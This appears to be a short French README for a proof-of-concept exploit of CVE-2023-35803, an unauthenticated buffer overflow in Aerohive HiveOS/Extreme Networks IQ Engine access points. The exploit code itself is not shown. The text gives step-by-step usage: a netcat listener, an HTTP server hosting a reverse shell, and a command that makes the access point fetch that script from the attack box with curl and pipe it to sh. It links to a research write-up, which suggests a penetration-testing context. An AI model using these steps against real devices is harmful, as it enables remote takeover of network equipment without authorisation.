
Proof-of-concept de l'exploitation de CVE-2023-35803, débordement de tampon non authentifié dans Aerohive HiveOS/Extreme Networks IQ Engine, permettant l'exécution de code à distance sur les points d'accès sans fil basés sur ARM.
PoC pour les points d'accès basés sur ARM exécutant HiveOS/IQ Engine <10.6r2.
revshell pour qu'il pointe vers l'IP/port de votre shell catcherpython3 -m http.servernc -lvnp 1337python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"Article complet ici : https://research.aurainfosec.io/pentest/bee-yond-capacity/
